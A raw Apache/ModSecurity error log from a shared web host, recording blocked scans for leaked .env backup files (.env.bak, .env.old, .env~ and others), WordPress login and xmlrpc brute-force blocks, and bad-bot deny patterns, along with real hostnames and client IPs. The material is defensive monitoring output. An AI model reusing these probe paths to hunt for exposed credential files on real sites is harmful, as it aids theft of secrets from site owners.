[Tue May 26 14:26:46.948869 2026] [security2:error] [pid 610693:tid 610850] [client 208.84.101.154:50034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.old"] [unique_id "ahVgTjvNO3hpmlY6M8RhVwAAABs"]
[Tue May 26 14:26:46.949722 2026] [security2:error] [pid 610693:tid 610950] [client 208.84.101.154:50028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhWQAAAH8"]
[Tue May 26 14:26:46.949885 2026] [security2:error] [pid 610693:tid 610934] [client 208.84.101.154:50144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local~"] [unique_id "ahVgTjvNO3hpmlY6M8RhTwAAAG8"]
[Tue May 26 14:26:46.949999 2026] [security2:error] [pid 610693:tid 610866] [client 208.84.101.154:50126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhVAAAACs"]
[Tue May 26 14:26:46.950961 2026] [security2:error] [pid 610693:tid 610855] [client 208.84.101.154:50066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env~"] [unique_id "ahVgTjvNO3hpmlY6M8RhXAAAACA"]
[Tue May 26 14:26:46.951887 2026] [security2:error] [pid 610693:tid 610916] [client 208.84.101.154:50146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhTgAAAF0"]
[Tue May 26 14:26:46.953019 2026] [security2:error] [pid 606909:tid 607136] [client 208.84.101.154:50130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.old"] [unique_id "ahVgTl0yRtX9qA7aVUVpBgAAAOY"]
[Tue May 26 14:26:46.953834 2026] [security2:error] [pid 610693:tid 610861] [client 208.84.101.154:50170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.backup"] [unique_id "ahVgTjvNO3hpmlY6M8RhTQAAACY"]
[Tue May 26 14:26:46.954640 2026] [security2:error] [pid 606909:tid 607076] [client 208.84.101.154:3958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.backup"] [unique_id "ahVgTl0yRtX9qA7aVUVpBwAAAKo"]
[Tue May 26 14:26:47.424407 2026] [autoindex:error] [pid 606909:tid 607081] [client 145.220.91.19:54718] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:48.958710 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgUF0yRtX9qA7aVUVpKAAAAOQ"]
[Tue May 26 14:26:50.316888 2026] [security2:error] [pid 606909:tid 607119] [client 202.141.83.254:53874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpQAAAANU"]
[Tue May 26 14:26:50.317017 2026] [security2:error] [pid 606909:tid 607119] [client 202.141.83.254:53874] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpQAAAANU"]
[Tue May 26 14:26:50.484876 2026] [core:crit] [pid 610693:tid 610903] (13)Permission denied: [client 52.167.144.210:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:50.577319 2026] [core:crit] [pid 606909:tid 607152] (13)Permission denied: [client 52.167.144.210:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:50.750434 2026] [autoindex:error] [pid 610693:tid 610866] [client 208.84.101.154:50224] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:50.855019 2026] [security2:error] [pid 606909:tid 607092] [client 154.161.32.97:46535] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgUl0yRtX9qA7aVUVpPwAAALo"]
[Tue May 26 14:26:51.146245 2026] [security2:error] [pid 610693:tid 610934] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgUjvNO3hpmlY6M8RhfQAAAG8"]
[Tue May 26 14:26:54.769171 2026] [security2:error] [pid 610693:tid 610895] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhowAAAEg"]
[Tue May 26 14:26:54.957215 2026] [security2:error] [pid 610693:tid 610886] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhqgAAAD8"]
[Tue May 26 14:26:55.189294 2026] [security2:error] [pid 610693:tid 610858] [client 74.7.230.60:54264] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhpQAAI2c"]
[Tue May 26 14:26:55.189332 2026] [security2:error] [pid 610693:tid 610858] [client 74.7.230.60:54264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVjvNO3hpmlY6M8RhpQAAI2c"]
[Tue May 26 14:26:55.856885 2026] [security2:error] [pid 606909:tid 606925] [remote 193.42.61.12:55298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgV10yRtX9qA7aVUVpeQABAQ8"]
[Tue May 26 14:26:55.928846 2026] [core:crit] [pid 610693:tid 610860] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:56.170549 2026] [security2:error] [pid 610693:tid 610911] [client 74.7.230.60:54278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVgVzvNO3hpmlY6M8RhzwAAWH0"], referer: https://www.yatirimfinans.cagmedya.com/robots.txt
[Tue May 26 14:26:56.668744 2026] [security2:error] [pid 606909:tid 607080] [client 34.7.53.211:55882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVgWF0yRtX9qA7aVUVpfwAAAK4"]
[Tue May 26 14:26:57.602128 2026] [core:crit] [pid 606909:tid 607086] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:57.651385 2026] [security2:error] [pid 610693:tid 610833] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgWTvNO3hpmlY6M8Rh4wAAAAo"]
[Tue May 26 14:26:58.782348 2026] [security2:error] [pid 610693:tid 610890] [client 45.132.227.225:57399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVgWDvNO3hpmlY6M8Rh2QAAAEM"]
[Tue May 26 14:26:59.431053 2026] [security2:error] [pid 606909:tid 607075] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgW10yRtX9qA7aVUVppAAAAKk"]
[Tue May 26 14:27:00.723321 2026] [security2:error] [pid 606909:tid 607124] [client 202.141.83.254:53828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgXF0yRtX9qA7aVUVpxAAAANo"]
[Tue May 26 14:27:00.723453 2026] [security2:error] [pid 606909:tid 607124] [client 202.141.83.254:53828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgXF0yRtX9qA7aVUVpxAAAANo"]
[Tue May 26 14:27:01.538047 2026] [security2:error] [pid 610693:tid 610879] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgXTvNO3hpmlY6M8RiEAAAADg"]
[Tue May 26 14:27:01.727867 2026] [security2:error] [pid 606909:tid 607077] [client 14.183.250.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgXV0yRtX9qA7aVUVp1QAAAKs"]
[Tue May 26 14:27:03.565531 2026] [security2:error] [pid 606909:tid 607144] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgX10yRtX9qA7aVUVp7QAAAO4"]
[Tue May 26 14:27:04.549488 2026] [security2:error] [pid 610693:tid 610928] [client 85.208.96.202:38216] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVgYDvNO3hpmlY6M8RiQwAAAGk"]
[Tue May 26 14:27:04.549720 2026] [security2:error] [pid 610693:tid 610928] [client 85.208.96.202:38216] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVgYDvNO3hpmlY6M8RiQwAAAGk"]
[Tue May 26 14:27:05.707111 2026] [security2:error] [pid 606909:tid 607079] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgYV0yRtX9qA7aVUVqBQAAAK0"]
[Tue May 26 14:27:06.990010 2026] [security2:error] [pid 610693:tid 610884] [client 34.90.191.83:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.wego.onesoft.in"] [uri "/"] [unique_id "ahVgYjvNO3hpmlY6M8RiZAAAAD0"]
[Tue May 26 14:27:06.990120 2026] [security2:error] [pid 610693:tid 610884] [client 34.90.191.83:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.wego.onesoft.in"] [uri "/"] [unique_id "ahVgYjvNO3hpmlY6M8RiZAAAAD0"]
[Tue May 26 14:27:07.310974 2026] [security2:error] [pid 610693:tid 610711] [remote 91.134.89.60:58984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVgYzvNO3hpmlY6M8RiZQAACBE"]
[Tue May 26 14:27:07.720538 2026] [security2:error] [pid 610693:tid 610712] [remote 112.196.0.228:57380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVgYzvNO3hpmlY6M8RicwAAIhI"]
[Tue May 26 14:27:07.899437 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgY10yRtX9qA7aVUVqFQAAAPg"]
[Tue May 26 14:27:09.926755 2026] [security2:error] [pid 610693:tid 610933] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgZTvNO3hpmlY6M8RikgAAAG4"]
[Tue May 26 14:27:11.300583 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:19925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgZzvNO3hpmlY6M8RiqAAAAHI"]
[Tue May 26 14:27:11.300753 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:19925] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgZzvNO3hpmlY6M8RiqAAAAHI"]
[Tue May 26 14:27:11.411705 2026] [security2:error] [pid 606909:tid 606968] [remote 167.99.5.1:39816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgZ10yRtX9qA7aVUVqPQAAsjo"]
[Tue May 26 14:27:11.782533 2026] [security2:error] [pid 610693:tid 610914] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgZzvNO3hpmlY6M8RirAAAAFs"]
[Tue May 26 14:27:13.915965 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgaTvNO3hpmlY6M8RiyQAAAGk"]
[Tue May 26 14:27:15.276160 2026] [core:crit] [pid 610693:tid 610915] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:27:15.455388 2026] [core:crit] [pid 610693:tid 610845] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:27:15.894552 2026] [security2:error] [pid 606909:tid 607099] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVga10yRtX9qA7aVUVqbgAAAME"]
[Tue May 26 14:27:17.096339 2026] [autoindex:error] [pid 610693:tid 610861] [client 68.183.224.77:54258] AH01276: Cannot serve directory /home1/moesartc/public_html/poonawallatennisacademy.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:27:17.468477 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgbTvNO3hpmlY6M8RjDQAAADQ"]
[Tue May 26 14:27:20.059384 2026] [security2:error] [pid 606909:tid 607127] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgb10yRtX9qA7aVUVqpQAAAN0"]
[Tue May 26 14:27:21.648963 2026] [security2:error] [pid 610693:tid 610924] [client 202.141.83.254:19959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgcTvNO3hpmlY6M8RjWgAAAGU"]
[Tue May 26 14:27:21.649071 2026] [security2:error] [pid 610693:tid 610924] [client 202.141.83.254:19959] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgcTvNO3hpmlY6M8RjWgAAAGU"]
[Tue May 26 14:27:22.146142 2026] [security2:error] [pid 606909:tid 607129] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgcV0yRtX9qA7aVUVqswAAAN8"]
[Tue May 26 14:27:23.646354 2026] [security2:error] [pid 610693:tid 610948] [client 44.194.98.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVgczvNO3hpmlY6M8RjeQAAAH0"]
[Tue May 26 14:27:24.289390 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgczvNO3hpmlY6M8RjhAAAAGk"]
[Tue May 26 14:27:24.771749 2026] [security2:error] [pid 610693:tid 610892] [client 74.7.244.28:38810] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "pgcsi.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVgdDvNO3hpmlY6M8RjkgAARQg"]
[Tue May 26 14:27:25.313648 2026] [security2:error] [pid 610693:tid 610936] [client 14.239.71.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgdDvNO3hpmlY6M8RjlAAAAHE"]
[Tue May 26 14:27:26.300329 2026] [security2:error] [pid 606909:tid 607045] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgdV0yRtX9qA7aVUVq9QAAAIs"]
[Tue May 26 14:27:27.389055 2026] [autoindex:error] [pid 606909:tid 607064] [client 104.168.28.15:39670] AH01276: Cannot serve directory /home2/glorolle/public_html/zeexo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:27:27.852515 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgd10yRtX9qA7aVUVrEQAAAPs"]
